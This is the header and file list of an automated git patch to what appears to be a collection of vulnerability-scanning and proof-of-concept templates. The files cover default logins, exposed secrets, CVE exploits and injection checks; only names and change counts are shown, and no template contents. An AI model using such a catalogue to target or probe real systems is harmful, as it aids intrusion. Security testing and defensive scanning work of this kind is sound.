From e051e5564c3032758ec1599e6c415ba0af566c5a Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Mon, 30 Sep 2024 12:43:24 +0000 Subject: [PATCH] 20240930 --- date.txt | 2 +- poc.txt | 1 + poc/adobe/adobe-connect-central-login.yaml | 14 +- .../adobe-connect-username-exposure.yaml | 52 +- poc/adobe/aem-crx-bypass.yaml | 6 + poc/adobe/aem-default-get-servlet-139.yaml | 19 +- poc/adobe/aem-detection-146.yaml | 6 +- poc/adobe/aem-groovyconsole-154.yaml | 17 +- poc/adobe/aem-hash-querybuilder-157.yaml | 11 +- .../aem-querybuilder-internal-path-read.yaml | 8 +- .../aem-querybuilder-json-servlet-187.yaml | 5 - poc/adobe/aem-userinfo-servlet.yaml | 14 +- poc/apache/default-apache-test-page-6816.yaml | 4 +- poc/api/Google-api.yaml | 3 + poc/api/alfacgiapi-wordpress-257.yaml | 62 +- poc/api/api-abstractapi.yaml | 6 +- poc/api/api-abuseipdb.yaml | 2 +- poc/api/api-bible.yaml | 3 +- poc/api/api-bravenewcoin.yaml | 3 +- poc/api/api-buildkite-402.yaml | 12 +- poc/api/api-circleci-405.yaml | 12 +- poc/api/api-covalent.yaml | 3 +- poc/api/api-dropbox-418.yaml | 10 +- poc/api/api-festivo.yaml | 3 +- poc/api/api-harvardart.yaml | 2 +- poc/api/api-improvmx.yaml | 3 +- poc/api/api-instatus.yaml | 3 +- poc/api/api-mailchimp-454.yaml | 3 +- poc/api/api-malwarebazaar.yaml | 2 +- poc/api/api-pastebin.yaml | 3 +- poc/api/api-pivotaltracker.yaml | 2 - poc/api/api-quip.yaml | 3 +- poc/api/api-urlscan.yaml | 2 +- poc/api/apisix-default-login-490.yaml | 20 +- poc/api/arcgis-rest-api.yaml | 5 +- poc/api/bems-api-lfi.yaml | 44 +- poc/api/burp-api-detect.yaml | 4 +- poc/api/gitlab-api-user-enum.yaml | 13 +- poc/api/google-api-key.yaml | 43 +- poc/api/kube-api-namespaces.yaml | 6 +- poc/api/kube-api-secrets.yaml | 4 + poc/api/sendgrid-api-key-10142.yaml | 4 +- poc/api/strapi-cms-detect.yaml | 5 - poc/api/swagger-api-10593.yaml | 14 +- poc/api/twilio-api.yaml | 5 +- poc/api/wadl-api-11083.yaml | 14 +- poc/api/yapi-detect.yaml | 5 +- poc/api/yapi-rce-11726.yaml | 25 +- poc/atlassian/atlassian-crowd-panel-583.yaml | 3 - poc/atlassian/atlassian-crowd-panel.yaml | 17 +- 
poc/atlassian/bitbucket-takeover-740.yaml | 6 +- poc/atlassian/confluence-detect-1189.yaml | 49 +- .../jira-service-desk-signup-8321.yaml | 1 + .../jira-unauthenticated-dashboards-8324.yaml | 2 +- poc/auth/BlindSQLAuth.yaml | 2 +- poc/auth/Shopify-custom-token.yaml | 5 +- poc/auth/activemq-default-login-47.yaml | 10 +- poc/auth/adobe-connect-central-login.yaml | 14 +- poc/auth/aims-password-mgmt-client.yaml | 10 + poc/auth/aims-password-portal-222.yaml | 2 +- poc/auth/alibaba-mongoshake-unauth.yaml | 2 +- poc/auth/amazon-mws-auth-token-282.yaml | 5 +- poc/auth/amazon-mws-auth-token-value.yaml | 40 +- poc/auth/ambari-default-login.yaml | 13 +- poc/auth/apc-ups-login.yaml | 3 +- poc/auth/apisix-default-login-490.yaml | 20 +- poc/auth/apollo-default-login.yaml | 10 +- poc/auth/arl-default-login-539.yaml | 9 +- poc/auth/atvise-login-589.yaml | 7 +- poc/auth/avatier-password-management.yaml | 27 +- poc/auth/aws-access-key-value-622.yaml | 8 +- poc/auth/azkaban-default-login-674.yaml | 94 +- poc/auth/canal-default-login-848.yaml | 14 +- poc/auth/cisco-systems-login.yaml | 15 +- poc/auth/cisco-ucs-kvm-login-980.yaml | 19 +- poc/auth/clave-login-panel.yaml | 4 +- poc/auth/codian-mcu-login-1139.yaml | 7 +- poc/auth/coldfusion-administrator-login.yaml | 6 +- .../commax-credentials-disclosure-1158.yaml | 3 +- poc/auth/comtrend-password-exposure.yaml | 3 +- poc/auth/credentials.yaml | 5 +- poc/auth/cs141-default-login.yaml | 14 +- poc/auth/dbeaver-credentials.yaml | 16 +- poc/auth/dell-idrac-default-login-6943.yaml | 26 +- poc/auth/dell-idrac9-default-login.yaml | 21 +- poc/auth/dell-wyse-login-6955.yaml | 7 +- poc/auth/django-secret.key.yaml | 45 +- poc/auth/druid-default-login.yaml | 9 +- poc/auth/emqx-default-login-7222.yaml | 9 +- poc/auth/exacqvision-default-login-7277.yaml | 5 +- poc/auth/facebook-secret.yaml | 4 +- poc/auth/fcm-server-key-7454.yaml | 3 +- poc/auth/frp-default-login-7557.yaml | 13 +- poc/auth/ftp-credentials-exposure.yaml | 6 +- 
poc/auth/git-credentials.yaml | 3 - poc/auth/gitea-login-7645.yaml | 4 +- poc/auth/gitlab-public-signup-7684.yaml | 9 +- poc/auth/gloo-unauth-7726.yaml | 5 + poc/auth/glpi-authentication-7727.yaml | 7 +- poc/auth/glpi-default-login-7732.yaml | 18 +- poc/auth/google-api-key.yaml | 43 +- poc/auth/google-earth-dlogin-7780.yaml | 6 + poc/auth/grafana-default-login.yaml | 18 +- poc/auth/hadoop-unauth.yaml | 9 +- .../hpe-system-management-login-8014.yaml | 54 +- ...awei-hg532e-default-router-login-8064.yaml | 9 +- poc/auth/hue-default-credential-8081.yaml | 23 +- poc/auth/ibm-mqseries-default-login-8107.yaml | 90 +- poc/auth/ibm-note-login-8110.yaml | 5 +- poc/auth/idemia-biometrics-default-login.yaml | 11 +- poc/auth/iptime-default-login-8192.yaml | 14 +- poc/auth/jinher-oa-default-login-8311.yaml | 10 +- poc/auth/jira-service-desk-signup-8321.yaml | 1 + .../jira-unauthenticated-dashboards-8324.yaml | 2 +- ...jira-unauthenticated-user-picker-8341.yaml | 13 +- poc/auth/jmx-default-login-8354.yaml | 20 +- poc/auth/keenetic-web-login-8442.yaml | 6 +- poc/auth/kentico-login.yaml | 3 +- poc/auth/keycloak-json-8472.yaml | 14 +- poc/auth/keycloak-openid-config.yaml | 6 +- poc/auth/kube-api-secrets.yaml | 4 + .../kyan-network-credentials-disclosure.yaml | 6 - poc/auth/lansweeper-login.yaml | 4 +- poc/auth/lutron-iot-default-login.yaml | 3 + .../mantisbt-default-credential-8779.yaml | 59 +- poc/auth/mofi4500-default-login.yaml | 3 +- poc/auth/mongodb-unauth-8926.yaml | 6 +- poc/auth/nagios-default-login.yaml | 3 - poc/auth/netsus-default-login.yaml | 9 +- poc/auth/nexus-default-password.yaml | 3 + poc/auth/nps-default-password.yaml | 3 - poc/auth/oauth2-detect.yaml | 54 +- poc/auth/octobercms-default-login.yaml | 17 +- poc/auth/ofbiz-default-login-9210.yaml | 14 - poc/auth/openemr-default-login.yaml | 11 +- poc/auth/pieregister-open-redirect.yaml | 13 +- .../putty-private-key-disclosure-9730.yaml | 28 +- poc/auth/rancher-default-login.yaml | 3 +- 
poc/auth/rockmongo-default-credentials.yaml | 5 - poc/auth/rockmongo-default-login.yaml | 3 +- poc/auth/sauter-login-10091.yaml | 5 +- poc/auth/sendgrid-api-key-10142.yaml | 4 +- .../servicenow-helpdesk-credential-10174.yaml | 10 +- poc/auth/sgp-login-panel-10185.yaml | 3 +- poc/auth/sharecenter-login-10189.yaml | 3 - poc/auth/shopify-token.yaml | 6 +- poc/auth/shoppable-token-10206.yaml | 3 - poc/auth/showdoc-default-login-10221.yaml | 11 +- poc/auth/sitefinity-login.yaml | 9 +- poc/auth/somfy-login.yaml | 2 +- poc/auth/sonarqube-login-10376.yaml | 7 +- poc/auth/spectracom-default-login.yaml | 17 +- poc/auth/sphider-login-10408.yaml | 4 +- poc/auth/squirrelmail-login-10521.yaml | 4 - poc/auth/ssrf-via-oauth-misconfig.yaml | 3 +- .../stem-audio-table-private-keys-10534.yaml | 5 - poc/auth/symantec-dlp-login.yaml | 3 +- poc/auth/symantec-epm-login.yaml | 4 +- poc/auth/symantec-ewep-login-10605.yaml | 7 +- poc/auth/tomcat-default-login.yaml | 12 +- poc/auth/trilithic-viewpoint-login.yaml | 20 +- poc/auth/twitter-secret(1).yaml | 6 +- poc/auth/unauth-rlm-10960.yaml | 10 +- poc/auth/unauth-wavink-panel.yaml | 5 +- poc/auth/unauth-xproxy-dashboard-10969.yaml | 17 +- poc/auth/unauthenticated-frp.yaml | 7 +- poc/auth/unauthenticated-netdata-10918.yaml | 10 +- poc/auth/unauthenticated-prtg.yaml | 9 +- ...thenticated-varnish-cache-purge-10933.yaml | 3 + poc/auth/unauthorized-h3csecparh-login.yaml | 5 +- poc/auth/unauthorized-hp-printer.yaml | 4 + ...ized-puppet-node-manager-detect-10959.yaml | 44 +- poc/auth/versa-default-login-11003.yaml | 19 +- poc/auth/vigor-login-11020.yaml | 6 +- poc/auth/vpms-auth-bypass-11069.yaml | 11 +- poc/auth/wifisky-default-password.yaml | 8 +- poc/auth/wordpress-weak-credentials.yaml | 7 - poc/auth/wpdm-cache-session-11439.yaml | 3 + poc/auth/wso2-default-login.yaml | 11 +- poc/auth/xenmobile-login-11677.yaml | 3 + poc/auth/zabbix-default-login-11760.yaml | 15 +- poc/auth/zabbix-server-login-11769.yaml | 6 +- 
poc/auth/zhiyuan-oa-session-leak-11802.yaml | 5 +- poc/auth/zhiyuan-oa-unauthorized-11806.yaml | 6 + poc/auth/zimbra-preauth-ssrf-11810.yaml | 20 +- poc/auth/zmanda-default-login-11826.yaml | 7 +- poc/auth/zoho-webhook-token-11835.yaml | 2 + poc/aws/S3Hunter.yaml | 3 +- poc/aws/amazon-mws-auth-token-282.yaml | 5 +- poc/aws/amazon-mws-auth-token-value.yaml | 40 +- poc/aws/aws-access-key-value-622.yaml | 8 +- poc/aws/s3-subtakeover.yaml | 4 + ...ordpress-total-upkeep-backup-download.yaml | 11 +- poc/backup/zip-backup-files-11820.yaml | 125 +- poc/cisco/cisco-network-config.yaml | 5 +- poc/cisco/cisco-prime-infrastructure-952.yaml | 2 +- poc/cisco/cisco-smi-exposure-970.yaml | 2 +- poc/cisco/cisco-systems-login.yaml | 15 +- poc/cisco/cisco-ucs-kvm-login-980.yaml | 19 +- poc/cnnvd/resin-cnnvd-200705-315-9865.yaml | 1 + poc/cnvd/CNVD-2019-32204.yaml | 3 - poc/cnvd/CNVD-2020-46552.yaml | 1 + poc/cnvd/CNVD-2021-10543.yaml | 10 +- poc/cnvd/CNVD-2021-14536.yaml | 8 +- poc/cnvd/CNVD-2021-15822.yaml | 8 +- poc/cnvd/CNVD-2021-15824.yaml | 4 - poc/cnvd/CNVD-2021-26422.yaml | 11 - poc/cnvd/CNVD-2021-28277.yaml | 15 +- poc/cnvd/CNVD-2021-30167.yaml | 19 +- poc/cnvd/CNVD-2022-03672.yaml | 13 +- poc/cnvd/cnvd-2018-13393-1037.yaml | 14 +- poc/cnvd/cnvd-2019-01348-1040.yaml | 12 +- poc/cnvd/cnvd-2020-23735-1055.yaml | 9 +- poc/cnvd/cnvd-2020-67113-1070.yaml | 21 +- poc/cnvd/cnvd-2020-68596-1073.yaml | 12 +- poc/cnvd/cnvd-2021-15822-1094.yaml | 11 +- .../coldfusion-administrator-login.yaml | 6 +- poc/coldfusion/coldfusion-debug-xss.yaml | 5 +- .../unpatched-coldfusion-10978.yaml | 2 + poc/config/aerohive-netconfig-ui-201.yaml | 70 +- poc/config/bigip-config-utility-detect.yaml | 13 +- poc/config/buffalo-config-injection.yaml | 7 +- poc/config/circleci-ssh-config.yaml | 2 +- poc/config/cisco-network-config.yaml | 5 +- poc/config/configuration-listing-1184.yaml | 6 +- poc/config/confluence-detect-1189.yaml | 49 +- poc/config/docker-compose-config.yaml | 4 - 
poc/config/dockercfg-config.yaml | 6 - poc/config/esmtprc-config-7258.yaml | 13 +- poc/config/front-page-misconfig.yaml | 10 +- poc/config/ftpconfig-7566.yaml | 33 +- poc/config/ftpconfig.yaml | 3 + poc/config/git-config-7636.yaml | 32 +- poc/config/joomla-config-file.yaml | 6 +- poc/config/keycloak-openid-config.yaml | 6 +- poc/config/magento-config.yaml | 6 +- poc/config/misconfigured-docker-8900.yaml | 8 +- poc/config/msmtp-config-8967.yaml | 5 - poc/config/nginx-config.yaml | 10 +- poc/config/phpmyadmin-misconfiguration.yaml | 1 - poc/config/rconfig-rce.yaml | 20 +- poc/config/samba-config-9987.yaml | 4 + poc/config/ssrf-via-oauth-misconfig.yaml | 3 +- poc/config/tcpconfig-10665.yaml | 2 +- poc/config/tugboat-config-exposure-10842.yaml | 5 - poc/config/web-config-11126.yaml | 154 +- .../wordpress-accessible-wpconfig-11236.yaml | 2 +- poc/config/wordpress-git-config-11278.yaml | 11 +- poc/crlf_injection/crlf-injection-1262.yaml | 13 +- .../viewlinc-crlf-injection-11015.yaml | 13 +- .../csrfguard-detect-1291.yaml | 20 +- poc/cve/CVE-2007-4556.yaml | 26 +- poc/cve/CVE-2009-0932.yaml | 24 +- poc/cve/CVE-2011-0049.yaml | 2 +- poc/cve/CVE-2012-0392.yaml | 24 +- poc/cve/CVE-2013-1965.yaml | 23 +- poc/cve/CVE-2015-5688.yaml | 38 +- poc/cve/CVE-2015-6544.yaml | 5 - poc/cve/CVE-2015-8349.yaml | 5 + poc/cve/CVE-2016-10033.yaml | 33 +- poc/cve/CVE-2016-5649.yaml | 17 +- poc/cve/CVE-2017-1000028.yaml | 58 +- poc/cve/CVE-2017-12542.yaml | 10 +- poc/cve/CVE-2017-12611.yaml | 5 - poc/cve/CVE-2017-12635.yaml | 13 +- poc/cve/CVE-2017-14535.yaml | 14 +- poc/cve/CVE-2017-14537.yaml | 22 +- poc/cve/CVE-2017-3506.yaml | 18 +- poc/cve/CVE-2017-6090.yaml | 8 +- poc/cve/CVE-2017-7529.yaml | 2 +- poc/cve/CVE-2017-9506.yaml | 44 +- poc/cve/CVE-2017-9805.yaml | 136 +- poc/cve/CVE-2018-1000129.yaml | 42 +- poc/cve/CVE-2018-1000861.yaml | 23 +- poc/cve/CVE-2018-15535.yaml | 13 +- poc/cve/CVE-2018-18069.yaml | 14 +- poc/cve/CVE-2018-2893.yaml | 19 +- poc/cve/CVE-2018-5230.yaml | 9 + 
poc/cve/CVE-2018-5233.yaml | 5 - poc/cve/CVE-2018-6910.yaml | 23 +- poc/cve/CVE-2018-7700.yaml | 27 +- poc/cve/CVE-2018-8033.yaml | 7 - poc/cve/CVE-2019-13396.yaml | 67 +- poc/cve/CVE-2019-14205.yaml | 53 +- poc/cve/CVE-2019-15043.yaml | 70 +- poc/cve/CVE-2019-16759.yaml | 45 +- poc/cve/CVE-2019-16997.yaml | 14 +- poc/cve/CVE-2019-19781.yaml | 31 +- poc/cve/CVE-2019-19985.yaml | 10 +- poc/cve/CVE-2019-20141.yaml | 6 - poc/cve/CVE-2019-5418.yaml | 2 +- poc/cve/CVE-2019-6112.yaml | 6 - poc/cve/CVE-2019-7256.yaml | 10 +- poc/cve/CVE-2019-8451.yaml | 42 +- poc/cve/CVE-2020-10199.yaml | 20 +- poc/cve/CVE-2020-11738.yaml | 19 +- poc/cve/CVE-2020-13483.yaml | 21 +- poc/cve/CVE-2020-13700.yaml | 13 +- poc/cve/CVE-2020-14413.yaml | 5 - poc/cve/CVE-2020-15148.yaml | 29 +- poc/cve/CVE-2020-17456.yaml | 25 +- poc/cve/CVE-2020-21224.yaml | 7 +- poc/cve/CVE-2020-24186.yaml | 18 +- poc/cve/CVE-2020-24571.yaml | 5 + poc/cve/CVE-2020-24579.yaml | 40 +- poc/cve/CVE-2020-25078.yaml | 21 +- poc/cve/CVE-2020-27735.yaml | 5 + poc/cve/CVE-2020-35489.yaml | 24 +- poc/cve/CVE-2020-35736.yaml | 2 +- poc/cve/CVE-2020-35951.yaml | 2 +- poc/cve/CVE-2020-36112.yaml | 36 +- poc/cve/CVE-2020-5515.yaml | 0 poc/cve/CVE-2020-5902.yaml | 53 +- poc/cve/CVE-2020-8115.yaml | 2 +- poc/cve/CVE-2020-8191.yaml | 37 +- poc/cve/CVE-2020-8515.yaml | 10 +- poc/cve/CVE-2020-8644.yaml | 4 +- poc/cve/CVE-2020-8982.yaml | 33 +- poc/cve/CVE-2021-20150.yaml | 24 +- poc/cve/CVE-2021-21816.yaml | 19 +- poc/cve/CVE-2021-22502.yaml | 9 +- poc/cve/CVE-2021-24286.yaml | 3 - poc/cve/CVE-2021-3017.yaml | 20 +- poc/cve/CVE-2021-31537.yaml | 5 +- poc/cve/CVE-2021-35587.yaml | 24 +- poc/cve/CVE-2021-45967.yaml | 17 +- poc/cve/CVE-2022-0378.yaml | 20 +- poc/cve/CVE-2022-24682.yaml | 102 +- poc/cve/CVE-2022-26159.yaml | 15 +- poc/cve/CVE-2022-28363.yaml | 21 +- poc/cve/CVE-2022-41352.yaml | 78 +- poc/cve/CVE-2023-6016.yaml | 98 +- poc/cve/CVE-2023-6019.yaml | 86 +- poc/cve/CVE-2023-6975.yaml | 80 +- poc/cve/CVE-2024-2912.yaml | 
58 +- poc/cve/CVE-2024-5550.yaml | 60 +- poc/cve/cve-2020-8115.yaml | 15 +- poc/cve/cve-2021-44152.yaml | 21 +- poc/cve/cve-2022-29303.yaml | 28 +- poc/cve/cve-2024-3400.yaml | 113 +- poc/cve/exploit-cve-2022-1388.yaml | 72 +- poc/cve/rce-cve-2021-41773.yaml | 55 +- poc/cve/springForShell-CVE-2022-22963.yaml | 75 +- poc/debug/coldfusion-debug-xss.yaml | 5 +- poc/debug/laravel-debug-enabled-8574.yaml | 14 +- poc/debug/pyramid-debug-toolbar.yaml | 3 - poc/debug/wamp-xdebug-detect.yaml | 7 +- poc/debug/werkzeug-debugger-detect-11197.yaml | 7 +- poc/debug/wordpress-debug-log-11258.yaml | 4 +- poc/default/activemq-default-login-47.yaml | 10 +- poc/default/aem-default-get-servlet-139.yaml | 19 +- poc/default/ambari-default-login.yaml | 13 +- poc/default/apisix-default-login-490.yaml | 20 +- poc/default/apollo-default-login.yaml | 10 +- poc/default/arl-default-login-539.yaml | 9 +- poc/default/azkaban-default-login-674.yaml | 94 +- poc/default/canal-default-login-848.yaml | 14 +- poc/default/cs141-default-login.yaml | 14 +- .../default-apache-test-page-6816.yaml | 4 +- .../default-centos-test-page-6826.yaml | 12 +- poc/default/default-django-page-6841.yaml | 4 +- poc/default/default-iis7-page.yaml | 17 +- poc/default/default-openresty.yaml | 7 +- .../default-oracle-application-page-6891.yaml | 4 +- .../default-redhat-test-page-6903.yaml | 12 +- .../dell-idrac-default-login-6943.yaml | 26 +- poc/default/dell-idrac9-default-login.yaml | 21 +- poc/default/druid-default-login.yaml | 9 +- poc/default/emqx-default-login-7222.yaml | 9 +- .../exacqvision-default-login-7277.yaml | 5 +- poc/default/frp-default-login-7557.yaml | 13 +- poc/default/glpi-default-login-7732.yaml | 18 +- poc/default/grafana-default-login.yaml | 18 +- ...awei-hg532e-default-router-login-8064.yaml | 9 +- poc/default/hue-default-credential-8081.yaml | 23 +- .../ibm-mqseries-default-login-8107.yaml | 90 +- .../idemia-biometrics-default-login.yaml | 11 +- poc/default/iptime-default-login-8192.yaml | 14 +- 
poc/default/jinher-oa-default-login-8311.yaml | 10 +- poc/default/jmx-default-login-8354.yaml | 20 +- poc/default/lighttpd-default-8627.yaml | 14 +- poc/default/lutron-iot-default-login.yaml | 3 + .../mantisbt-default-credential-8779.yaml | 59 +- poc/default/mofi4500-default-login.yaml | 3 +- poc/default/nagios-default-login.yaml | 3 - poc/default/netsus-default-login.yaml | 9 +- poc/default/nexus-default-password.yaml | 3 + poc/default/nps-default-password.yaml | 3 - poc/default/octobercms-default-login.yaml | 17 +- poc/default/ofbiz-default-login-9210.yaml | 14 - poc/default/openemr-default-login.yaml | 11 +- poc/default/rancher-default-login.yaml | 3 +- .../rockmongo-default-credentials.yaml | 5 - poc/default/rockmongo-default-login.yaml | 3 +- poc/default/showdoc-default-login-10221.yaml | 11 +- poc/default/spectracom-default-login.yaml | 17 +- poc/default/tomcat-default-login.yaml | 12 +- poc/default/versa-default-login-11003.yaml | 19 +- poc/default/wifisky-default-password.yaml | 8 +- poc/default/wso2-default-login.yaml | 11 +- poc/default/zabbix-default-login-11760.yaml | 15 +- poc/default/zmanda-default-login-11826.yaml | 7 +- poc/detect/Biometric-detect.yaml | 1 + poc/detect/aem-detection-146.yaml | 6 +- poc/detect/autobahn-python-detect-593.yaml | 8 +- poc/detect/bedita-detect.yaml | 50 +- poc/detect/bigip-config-utility-detect.yaml | 13 +- poc/detect/burp-api-detect.yaml | 4 +- poc/detect/cacti-detect.yaml | 3 +- poc/detect/carestream-vue-detect-861.yaml | 11 +- poc/detect/chevereto-detect.yaml | 8 +- poc/detect/citrix-adc-gateway-detect-983.yaml | 8 +- poc/detect/confluence-detect-1189.yaml | 49 +- poc/detect/contentkeeper-detect.yaml | 3 +- poc/detect/csrfguard-detect-1291.yaml | 20 +- poc/detect/darkstat-detect.yaml | 3 - poc/detect/dell-idrac6-detect.yaml | 2 +- poc/detect/dell-idrac7-detect-6922.yaml | 8 +- poc/detect/detect-dns-over-https.yaml | 6 +- poc/detect/detect-drone.yaml | 5 +- poc/detect/detect-sentry-6983.yaml | 11 +- 
poc/detect/dns-waf-detect-7054.yaml | 5 - .../elasticsearch-sql-client-detect.yaml | 43 +- poc/detect/froxlor-detect-7552.yaml | 9 +- poc/detect/gitlab-detect.yaml | 2 + poc/detect/grafana-detect.yaml | 7 - poc/detect/graphql-detect.yaml | 4 +- poc/detect/grav-cms-detect-7842.yaml | 12 +- poc/detect/gunicorn-detect.yaml | 10 +- poc/detect/itop-detect.yaml | 5 - poc/detect/jaspersoft-detect.yaml | 1 + poc/detect/jboss-detect.yaml | 24 +- poc/detect/jeedom-detect.yaml | 5 - poc/detect/jenkins-detect.yaml | 5 - poc/detect/kevinlab-device-detect-8461.yaml | 6 +- poc/detect/linkerd-service-detect-8634.yaml | 25 +- poc/detect/linkerd-ssrf-detect.yaml | 9 - poc/detect/lucee-detect-8661.yaml | 26 +- poc/detect/lucee-detect.yaml | 8 +- poc/detect/magmi-detect.yaml | 2 +- .../microsoft-echange-server-detect.yaml | 6 - poc/detect/moinmoin-detect-8917.yaml | 11 +- poc/detect/mrtg-detect-8958.yaml | 17 +- poc/detect/mrtg-detect.yaml | 2 + poc/detect/neos-detect.yaml | 9 +- poc/detect/nexus-detect.yaml | 42 +- poc/detect/oauth2-detect.yaml | 54 +- poc/detect/octobercms-detect-9196.yaml | 12 +- poc/detect/oipm-detect-9219.yaml | 11 +- poc/detect/openx-detect.yaml | 11 +- poc/detect/php-proxy-detect-9544.yaml | 11 +- poc/detect/pi-hole-detect-9581.yaml | 1 + .../prometheus-exporter-detect-9676.yaml | 2 - poc/detect/prtg-detect.yaml | 4 - poc/detect/puppetserver-detect-9723.yaml | 17 +- poc/detect/ranger-detection-9830.yaml | 54 +- poc/detect/rdp-detect-9840.yaml | 20 +- poc/detect/redcap-detector-9850.yaml | 5 - poc/detect/redmine-cli-detect-9854.yaml | 6 +- poc/detect/rhymix-cms-detect.yaml | 8 +- poc/detect/samba-detect-9988.yaml | 10 +- poc/detect/sap-netweaver-detect-10044.yaml | 6 +- poc/detect/secmail-detect.yaml | 3 +- poc/detect/seeddms-detect-10129.yaml | 40 +- poc/detect/shiro-detect.yaml | 9 +- poc/detect/shopware-detect.yaml | 4 - poc/detect/strapi-cms-detect.yaml | 5 - poc/detect/tech-detect-10672.yaml | 511 +- poc/detect/terraform-detect-10708.yaml | 8 +- 
poc/detect/thinkcmf-detect.yaml | 17 +- ...ized-puppet-node-manager-detect-10959.yaml | 44 +- poc/detect/virtual-ema-detect.yaml | 2 +- poc/detect/vsftpd-detection.yaml | 16 +- poc/detect/wamp-xdebug-detect.yaml | 7 +- poc/detect/wazuh-detect.yaml | 3 - poc/detect/weblogic-detect-11144.yaml | 15 +- .../werkzeug-debugger-detect-11197.yaml | 7 +- poc/detect/wordpress-plugins-detect.yaml | 28 +- poc/detect/wordpress-themes-detect-11316.yaml | 23 +- .../wp-xmlrpc-pingback-detection-11627.yaml | 2 +- poc/detect/yapi-detect.yaml | 5 +- .../Apexis-IPCAM-directory-traversal.yaml | 0 ...filedownload-directory-traversal-7171.yaml | 3 +- ...gy-springframework-directoryTraversal.yaml | 0 .../erp-nc-directory-traversal.yaml | 4 + .../flir-path-traversal.yaml | 7 +- ...bm-infoprint-directory-traversal-8098.yaml | 13 +- .../natshell-path-traversal.yaml | 19 +- .../oa-tongda-path-traversal-9177.yaml | 6 +- .../pmb-directory-traversal.yaml | 13 +- .../tpshop-directory-traversal.yaml | 17 +- .../wooyun-path-traversal.yaml | 22 +- poc/docker/docker-compose-config.yaml | 4 - poc/docker/dockercfg-config.yaml | 6 - poc/docker/dockerfile-hidden-disclosure.yaml | 3 +- .../kubernetes-enterprise-manager-8528.yaml | 10 +- poc/docker/kubernetes-pods-8542.yaml | 19 +- poc/docker/kubernetes-version.yaml | 13 +- poc/docker/misconfigured-docker-8900.yaml | 8 +- poc/elk/0xelkotsqli.yaml | 958 +- poc/elk/elasticsearch-sql-client-detect.yaml | 43 +- poc/elk/exposed-kibana.yaml | 10 +- poc/elk/kibana-panel.yaml | 4 - .../adobe-connect-username-exposure.yaml | 52 +- poc/exposed/ansible-tower-exposure.yaml | 29 +- poc/exposed/appspec-yml-disclosure-529.yaml | 3 +- poc/exposed/beward-ipcamera-disclosure.yaml | 9 +- poc/exposed/cisco-smi-exposure-970.yaml | 2 +- .../clockwork-dashboard-exposure-1012.yaml | 60 +- .../commax-credentials-disclosure-1158.yaml | 3 +- poc/exposed/comtrend-password-exposure.yaml | 3 +- poc/exposed/couchdb-exposure-1239.yaml | 5 +- poc/exposed/dockerfile-hidden-disclosure.yaml | 
3 +- poc/exposed/exposed-adb-7280.yaml | 15 +- poc/exposed/exposed-alps-spring-7284.yaml | 16 +- poc/exposed/exposed-kibana.yaml | 10 +- poc/exposed/exposed-nomad-7327.yaml | 71 +- poc/exposed/exposed-redis-7337.yaml | 4 +- poc/exposed/exposed-sqlite-manager-7350.yaml | 3 - poc/exposed/exposed-svn-7352.yaml | 9 +- poc/exposed/exposed-swagger.yaml | 78 +- poc/exposed/ftp-credentials-exposure.yaml | 6 +- poc/exposed/gogs-install-exposure.yaml | 2 +- poc/exposed/iceflow-vpn-disclosure.yaml | 13 +- poc/exposed/iis-internal-ip-disclosure.yaml | 19 +- .../kyan-network-credentials-disclosure.yaml | 6 - poc/exposed/lvmeng-uts-disclosure.yaml | 8 +- poc/exposed/monitorix-exposure.yaml | 2 +- .../prometheus-exposed-panel-9684.yaml | 6 +- .../putty-private-key-disclosure-9730.yaml | 28 +- poc/exposed/qihang-media-disclosure.yaml | 3 +- .../ruijie-information-disclosure-9932.yaml | 22 +- .../ruijie-information-disclosure.yaml | 5 + poc/exposed/sensitive-storage-exposure.yaml | 3 +- poc/exposed/thumbs-db-disclosure-10763.yaml | 6 +- .../tugboat-config-exposure-10842.yaml | 5 - .../wp-mailchimp-log-exposure-11492.yaml | 9 +- poc/ftp/ftp-credentials-exposure.yaml | 6 +- poc/ftp/ftpconfig-7566.yaml | 33 +- poc/ftp/ftpconfig.yaml | 3 + poc/ftp/vsftpd-detection.yaml | 16 +- poc/fuzz/xss-fuzz-11701.yaml | 6 +- poc/git/Digital-Signage-rce.yaml | 13 +- poc/git/git-config-7636.yaml | 32 +- poc/git/git-credentials.yaml | 3 - poc/git/gitea-login-7645.yaml | 4 +- poc/git/gitlab-api-user-enum.yaml | 13 +- poc/git/gitlab-detect.yaml | 2 + poc/git/gitlab-public-repos.yaml | 8 +- poc/git/gitlab-public-signup-7684.yaml | 9 +- poc/git/wordpress-git-config-11278.yaml | 11 +- poc/google/Google-api.yaml | 3 + poc/google/google-api-key.yaml | 43 +- poc/google/google-earth-dlogin-7780.yaml | 6 + poc/google/metadata-google-8820.yaml | 10 +- poc/graphql/graphql-array-batching-7827.yaml | 26 +- poc/graphql/graphql-detect.yaml | 4 +- poc/header/header-command-injection-7917.yaml | 17 +- 
poc/header/log4j-header.yaml | 79 +- .../oob-header-based-interaction-9250.yaml | 3 +- poc/header/sqliheader.yaml | 4 +- poc/http/detect-dns-over-https.yaml | 6 +- poc/http/lighttpd-default-8627.yaml | 14 +- poc/ibm/ibm-infoprint-lfi.yaml | 2 - poc/ibm/ibm-mqseries-default-login-8107.yaml | 90 +- poc/ibm/ibm-note-login-8110.yaml | 5 +- poc/ibm/ibm-service-assistant.yaml | 8 +- poc/injection/GLPI-9.3.3-SQL-Injection.yaml | 55 +- poc/injection/buffalo-config-injection.yaml | 7 +- poc/injection/crlf-injection-1262.yaml | 13 +- .../header-command-injection-7917.yaml | 17 +- .../viewlinc-crlf-injection-11015.yaml | 13 +- poc/injection/weiphp-sql-injection.yaml | 16 +- ...gy-springframework-directoryTraversal.yaml | 0 poc/java/exposed-alps-spring-7284.yaml | 16 +- poc/java/java-melody-xss-8225.yaml | 7 +- poc/java/jboss-detect.yaml | 24 +- poc/java/jboss-status-8241.yaml | 64 +- poc/java/jinfornet-jreport-lfi-8309.yaml | 5 - poc/java/public-tomcat-manager-9709.yaml | 10 +- poc/java/shiro-detect.yaml | 9 +- poc/java/springForShell-CVE-2022-22963.yaml | 75 +- .../springboot-actuators-jolokia-xxe.yaml | 19 +- poc/java/springboot-dump.yaml | 1 + poc/java/springboot-heapdump-10463.yaml | 8 +- poc/java/springboot-info.yaml | 9 +- poc/java/springboot-log4j-rce.yaml | 7 +- poc/java/springboot-loggers-10475.yaml | 18 +- poc/java/springboot-mappings.yaml | 4 +- poc/java/springboot-threaddump-10484.yaml | 9 +- poc/java/springboot-trace-10492.yaml | 9 +- poc/java/tomcat-default-login.yaml | 12 +- poc/java/tomcat-scripts-10802.yaml | 2 - 